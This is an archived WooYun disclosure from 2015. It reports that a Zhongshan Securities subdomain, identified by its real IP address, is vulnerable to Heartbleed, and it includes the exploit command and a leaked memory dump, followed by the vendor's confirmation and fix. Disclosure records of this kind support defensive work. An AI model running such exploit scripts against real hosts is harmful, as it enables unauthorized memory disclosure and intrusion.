乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-13: 细节已通知厂商并且等待厂商处理中 2015-10-16: 厂商已经确认,细节仅向厂商公开 2015-10-16: 厂商已经修复漏洞并主动公开,细节向公众公开
中山证券某分站存在心脏滴血
https://121.15.129.252/
心脏滴血:
$ python openssl.py 121.15.129.252 | moreConnecting...Sending Client Hello...Waiting for Server Hello... ... received message: type = 22, ver = 0302, length = 66 ... received message: type = 22, ver = 0302, length = 2100 ... received message: type = 22, ver = 0302, length = 331 ... received message: type = 22, ver = 0302, length = 4Sending heartbeat request... ... received message: type = 24, ver = 0302, length = 16384Received heartbeat response: 0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C [email protected][...r... 0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90 .+..H...9....... 0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0 .w.3....f.....". 0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00 !.9.8.........5. 0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0 ................ 0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00 ............3.2. 0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00 ....E.D...../... 0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00 A............... 0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01 ................ 0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00 ..I...........4. 00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00 2............... 00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 ................ 00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00 ................ 00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 4C 2C 20 6C ....#.......L, l 00e0: 69 6B 65 20 47 65 63 6B 6F 29 20 43 68 72 6F 6D ike Gecko) Chrom 00f0: 65 2F 34 35 2E 30 2E 32 34 35 34 2E 31 30 31 20 e/45.0.2454.101 0100: 53 61 66 61 72 69 2F 35 33 37 2E 33 36 0D 0A 52 Safari/537.36..R 0110: 65 66 65 72 65 72 3A 20 68 74 74 70 73 3A 2F 2F eferer: https:// 0120: 31 32 31 2E 31 35 2E 31 32 39 2E 32 35 32 2F 6F 121.15.129.252/o 0130: 73 6F 61 2F 63 73 73 2F 73 74 79 6C 65 2E 63 73 soa/css/style.cs 0140: 73 3F 76 3D 32 2E 30 2E 34 0D 0A 41 63 63 65 70 s?v=2.0.4..Accep 0150: 74 2D 45 6E 63 6F 64 69 6E 67 3A 20 67 7A 69 70 t-Encoding: gzip 0160: 2C 20 64 65 66 6C 61 74 65 2C 20 73 64 63 68 0D , deflate, sdch.
如上
升级
危害等级:低
漏洞Rank:1
确认时间:2015-10-16 09:49
测试环境。
2015-10-16:确认修复
2015-10-16:已修复